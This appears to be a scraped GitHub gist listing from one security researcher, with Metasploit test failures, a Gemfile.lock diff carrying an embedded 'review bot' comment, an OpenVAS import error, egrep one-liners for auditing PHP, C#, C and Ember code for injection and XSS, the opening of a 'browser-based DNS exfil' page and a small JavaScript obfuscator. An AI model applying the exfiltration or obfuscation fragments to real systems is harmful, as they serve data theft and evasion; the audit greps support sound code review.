Nicholas Starke nstarke

rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsbe, fmt=elf
rspec ./spec/lib/msf/util/exe_spec.rb:65 # Msf::Util::EXE.to_executable_fmt with platform=linux returns an executable when given arch=mipsle, fmt=elf
rspec ./spec/lib/rex/socket/range_walker_spec.rb:29 # Rex::Socket::RangeWalker.new with an invalid hostname should not be valid
rspec ./spec/lib/rex/socket/range_walker_spec.rb:34 # Rex::Socket::RangeWalker.new with an invalid hostname and CIDR should not be valid
Failure/Error: verify_bin_fingerprint(format_hash, bin)
expected: /ELF 32-bit MSB executable, MIPS/
got: "/dev/stdin: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size\n" (using =~)
Diff:
@@ -1,2 +1,2 @@
nstarke / gist:11306563
Last active August 29, 2015 14:00
Gemfile.lock-diff
--- ../Gemfile.lock 2014-04-25 21:35:15.353280736 +0000
+++ Gemfile.lock 2014-04-25 23:05:47.249280736 +0000
@@ -1,27 +1,27 @@
GEM
remote: https://rubygems.org/
specs:
- activemodel (3.2.14)
- activesupport (= 3.2.14)
+ activemodel (3.2.17)
+ activesupport (= 3.2.17)
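Review bot: the activemodel and activesupport entries at the top of this hunk move from 3.2.14 to 3.2.17, but nothing visible here says why the lockfile changed. Record whether this came from a deliberate `bundle update` of these gems, and check that every other entry pinned with `= 3.2.14` in the rest of the 27-line hunk moves to 3.2.17 as well so the lockfile resolves to one consistent version.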
nstarke / gist:aabe781c6967a7f03adb
Created January 12, 2015 01:50
openvas-report-import-msf-error
msf > openvas_report_import 1 11
[*] Importing report to database.
[-] Error while running command openvas_report_import: getaddrinfo: Name or service not known
Call stack:
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `gethostbyname'
/home/nick/metasploit-framework/lib/rex/socket.rb:181:in `getaddresses'
/home/nick/metasploit-framework/lib/rex/socket.rb:165:in `getaddress'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:93:in `normalize_host'
/home/nick/metasploit-framework/lib/msf/core/db_manager/host.rb:160:in `block in report_host'
<report content_type='text/xml' extension='xml' format_id='a994b278-1f62-11e1-96ac-406186ea4fc5' id='7fa042b4-55ee-4ece-a647-7f2288e24b5c' type='scan'><owner><name/></owner><name>2015-01-12T01:24:46Z</name><comment/><creation_time>2015-01-12T01:24:46Z</creation_time><modification_time>2015-01-12T01:32:42Z</modification_time><writable>0</writable><in_use>0</in_use><report id='7fa042b4-55ee-4ece-a647-7f2288e24b5c'><report_format/><sort><field>type<order>descending</order></field></sort><filters id='0'><term>sort-reverse=ROWID result_hosts_only=1 min_cvss_base= levels=hmlgd autofp=0 notes=0 overrides=0 first=1 rows=-1 delta_states=cgns</term>hmlgd<phrase/><autofp>0</autofp><notes>0</notes><overrides>0</overrides><apply_overrides>0</apply_overrides><result_hosts_only>1</result_hosts_only><min_cvss_base/><filter>High</filter><filter>Medium</filter><filter>Low</filter><filter>Log</filter><filter>Debug</filter></filters><severity_class id='d4c74cda-89e1-11e3-9c29-406186ea4fc5'><name>nist</name><full_name>NVD Vulnera
nstarke / emberjs-egrep-unsafe-handlebars-parameters.sh
Last active August 29, 2015 14:25
EmberJS one-liner to find unsafe handlebars parameters
# searches for {{{ or }}} in all .handlebars or .hbs files
# {{{ and }}} signify unsafe template parameters in EmberJS
# tested on OS X 10.10
egrep -r --include "*.handlebars" --include "*.hbs" "\{\{\{|\}\}\}" .
nstarke / CSharp-Vulnerability-Egrep.sh
Last active December 5, 2015 17:39
Egrep commands to find security vulnerabilities and perform security audits on CSharp code. Useful for penetration testers operating in a Microsoft / CSharp environment.
# Returns instances where anti-XSS measures are deployed
egrep -r --include "*.cs" -e "(AntiXssEncoder|Server\.HtmlEncode|Html\.Encode)" .
# Returns possible command injection areas
egrep -r --include "*.cs" -e "(Process|Process\.Start)\(" .
# Returns possible XSS scenarios (string concatenation in HTML/XML)
egrep -r --include "*.cs" -e "<.*>\"\s*\+.*\+\s*\"<.*>" .
# Returns places where anti-CSRF measures are deployed
nstarke / c-cpp-egrep.sh
Created February 27, 2016 18:16
C and C++ Egrep
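# see all character arrays of any hardcoded length
# ([0-9] instead of \d: egrep's ERE syntax has no \d digit class; _ added so names like my_buf match)
egrep --include "*.c*" -rnI -e 'char\s+[a-zA-Z0-9_]+\[[0-9]+\]' .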
nstarke / php-vulnerability-egrep.sh
Last active October 4, 2016 22:15
PHP Vulnerability egrep
# this command searches all PHP files in a directory for vulnerable shell functions
egrep -r --include "*.php" -e "(system|exec|popen|pcntl_exec|proc_open)\(" .
# this command searches all PHP files in a directory for certain vulnerable php execution functions
egrep -r --include "*.php" -e "(eval|assert|preg_replace)\(" .
# this command returns instances where variables are echoed out without htmlspecialchars()
# it can be useful for finding XSS vulnerabilities in PHP code
egrep -r --include "*.php" -e "echo\s*\\$.*;" .
nstarke / bacon-ipsum.html
Last active January 14, 2017 03:48
Browser Based DNS Exfil
<!DOCTYPE html>
<html style="width:100%;height:100%;">
<head>
<title>DNS-Exfil.js</title>
<script>
var targetId = Math.round(Math.random() * 1000000);
var sessionId = guid();
function doRequest(){
nstarke / simple-js-obfuscation.js
Created July 23, 2015 20:21
simple js obfuscation
function rewrite(text) {
var obs = "";
for (var i = 0; i < text.length; i++) {
obs += "(function() { return String.fromCharCode(" + text[i].charCodeAt(0) + "); })() + ";
}
obs += ' ""';
return obs;
}
var n = rewrite('console.log("test")');